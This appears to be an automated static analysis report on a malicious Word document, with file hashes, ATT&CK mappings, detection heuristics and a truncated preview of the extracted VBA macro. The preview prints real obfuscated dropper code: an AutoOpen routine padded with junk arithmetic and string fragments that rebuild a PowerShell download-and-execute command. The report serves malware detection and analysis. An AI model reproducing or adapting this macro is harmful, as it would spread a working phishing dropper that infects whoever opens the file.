Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f8b563cf916bfa94…

MALICIOUS

Office (OLE)

Size: 189.5 KB
Created: 2017-12-21 17:37:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: c9949cffe4462c2af313c7745a41b353
SHA-1: b66b1f5de324b867ec994611ae0e78a4e443347d
SHA-256: f8b563cf916bfa94d42076e3fc2ab0a59cd1bfa9974311fab8868db35a0f92ab
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro uses the Shell() function, indicating an attempt to execute a secondary payload. The presence of an embedded URL suggests a download or redirection mechanism. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports a phishing or lure-based dropper functionality.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • https://lo8nK+8nKo8n (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 70006 bytes
SHA-256: e0b7776c155e95e57eda5d6e0301f4393e44b027f5fb6ed311e5c464a0bac158

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "twawakjd"
Sub AutoOpen()
On Error Resume Next
icFAHRqJn = 871 / Rnd(4) + QuDQzNchXXHouI + RwAkjjhBsPtw * 9 + Int(DzpObtTWJtIj * CStr(YzDpqiwNpUp)) + HNitKBGOsi * CDate(3624 - 352183467 * 84 / 475) / itMAoQHDsB - CSng(620)
AIhwDZLBW = 871 / Rnd(4) + fzpTjkcws + UntbVwd * 9 + Int(IzhQzWHFAvHb * CStr(NVRsjDtUEnJLph)) + OGdHwctZ * CDate(3624 - 352183467 * 84 / 475) / OBSMakhrQHG - CSng(620)
SbimskNDJ = 871 / Rnd(4) + EIpvquSAfR + wmihkjtUGR * 9 + Int(iatmXrOMOpPGJt * CStr(RjpOqlpmVpE)) + HDUjDGJ * CDate(3624 - 352183467 * 84 / 475) / PBEXblTCihf - CSng(620)
UoHPJirbK = 871 / Rnd(4) + nYwSmHIuGLzzT + PfSnFRmIo * 9 + Int(jPznKEMf * CStr(hcdHEoiKIYVfUV)) + zdLDVsFijmiWHV * CDate(3624 - 352183467 * 84 / 475) / BzUAllmYOwbH - CSng(620)
ikTiOuFnj = 871 / Rnd(4) + IKGcztUVSWpYX + LUkJNFzEul * 9 + Int(uQITcBhDIqJ * CStr(JntEsjESFNzSu)) + wabvDPVA * CDate(3624 - 352183467 * 84 / 475) / dLBqVHV - CSng(620)
Application.Run "iwdTFiPntrh", SEwawinqQWs
OiBbbVTBE = 871 / Rnd(4) + pSVhTqZREG + MmuXIkQsqqi * 9 + Int(kwSQTjbG * CStr(qjaCfVKVcY)) + BtBsHDTkD * CDate(3624 - 352183467 * 84 / 475) / OhHIkiAZ - CSng(620)
GidzCWGUU = 871 / Rnd(4) + PGXOSSJrwaI + QqDRcwSuu * 9 + Int(JvWqnBrflnjq * CStr(zkzOoztmaQ)) + RmwktHBaicwcs * CDate(3624 - 352183467 * 84 / 475) / iHzQpVjZVFj - CSng(620)
ckivAAjif = 871 / Rnd(4) + AEGmdmIIsB + HmJrtVlv * 9 + Int(rQrEQXXf * CStr(cNzNDiDtiLiX)) + cDXVzUDHf * CDate(3624 - 352183467 * 84 / 475) / iUjjNCVFPdaQnK - CSng(620)
uifoAqZMo = 871 / Rnd(4) + onjvZCbazPO + XupqJFTtqMQMa * 9 + Int(oPGoYWjGv * CStr(VajMCATYvB)) + lwJhTtuj * CDate(3624 - 352183467 * 84 / 475) / XTUKOLTIqsM - CSng(620)
RzPVjZGqq = 871 / Rnd(4) + rQZEDQwHFclXT + BFVzqjL * 9 + Int(DouljoztmEsj * CStr(DvGLvWBlQbt)) + NTiDIzJhJNk * CDate(3624 - 352183467 * 84 / 475) / RhIJLqji - CSng(620)
End Sub
Function SEwawinqQWs()
On Error Resume Next
jwKzYwZaGT = 871 / Rnd(4) + PFjiEIEwillHV + wSiErkCDPiBGh * 9 + Int(siizrUtXh * CStr(sluJrsHtjF)) + jLSwzoLq * CDate(3624 - 352183467 * 84 / 475) / jwapFDHlQAzYkM - CSng(620)
hRBaK = 871 / Rnd(4) + AhQTjmzchh + ZTCszIkPnX * 9 + Int(HmZihAYjnCljK * CStr(scCKfTuZBob)) + IcOEztwI * CDate(3624 - 352183467 * 84 / 475) / dtAEzEBuWok - CSng(620)
jCfjHAn = Mid("1V8i8nK/xum8nK+8nKi8nK+8nKA/r8nK+8nKKA.'+'Splitc56wvZnhjJlIbVuO4o9iR1c3PqWpIlzzH", 5, 43)
LzwfsD = 871 / Rnd(4) + GqtLXbIW + GJTMDrfihjp * 9 + Int(KEEokWdjHjwzFq * CStr(vzSWYcwi)) + jviYUPrBWSwmpX * CDate(3624 - 352183467 * 84 / 475) / EfnUXLTGNiki - CSng(620)
JUOtjGfLzbf = 871 / Rnd(4) + dLPIYlIGZ + kARPCjUZ * 9 + Int(BfGautfYEG * CStr(ivzNvQPG)) + hKEDzzuGN * CDate(3624 - 352183467 * 84 / 475) / cEOfPiWkUPt - CSng(620)
Olovk = 871 / Rnd(4) + MRRLVIEpn + Osswdnt * 9 + Int(GbjRsoiLjQ * CStr(VqkjcoEBkQjTw)) + aZciOqTTL * CDate(3624 - 352183467 * 84 / 475) / GhvYcjJZoBR - CSng(620)
EmJAvzS = Mid("RdjYCSUVmGwfNsVCBCvtKJXKe(8nK+8nKlR'+'eab8nK+8nKc.ToS'+'8nK+8nKtring(), l8nK+8nKR8nK+8nKehua8nK+8nK'+'s);InMYD+MYDvo8nK+8nKke-Ite8nK+8nKm(8nK+8n'+'KMYD+MYDlRehu8'+'nK+8nKas);bre8nKUoUUESPkaDT", 24, 157)
PMuEDSNC = 871 / Rnd(4) + EzSioAETl + OHorbDczw * 9 + Int(LadDPQjfZf * CStr(qYUGElTJuCtsKp)) + rYGTIXRU * CDate(3624 - 352183467 * 84 / 475) / dVPOYQZ - CSng(620)
jwUAFd = 871 / Rnd(4) + fzlAWnEXnLFijf + zkXbJDmRsW * 9 + Int(wEvjnEQzXEU * CStr(jNkLNnaSaHbESC)) + Jssftiqqz * CDate(3624 - 352183467 * 84 / 475) / HYBShIQilnN - CSng(620)
hwssBTiJ = 871 / Rnd(4) + FXYjTkWSIoDWSi + OIYKYFXWZ * 9 + Int(SciVEkd * CStr(wmnQXXokBzj)) + wjvDBFzGB * CDate(3624 - 352183467 * 84 / 475) / iAzfBHnwDDatT - CSng(620)
FsOEw = Mid("TX8HuQjFnii+8nK'+'MYD+MYDak;}ca8nK+8nKtc8nK+8nKh{wri8nK+8nKt8nK+8nKus3zzRmHijiO8dWzJY9J7TWJK", 12, 56)
UNFiGoV = 871 / Rnd(4) + sZiSEFpdrN + lGGiYbUtWkjF * 9 + Int(YztzKZjOF * CStr(ATBaakBWktoP)) + bdrDRuqo * CDate(3624 - 352183467 * 84 / 
... (truncated)